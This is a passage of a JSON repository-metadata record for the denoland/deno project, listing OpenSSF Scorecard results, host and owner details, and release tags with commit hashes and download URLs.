pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p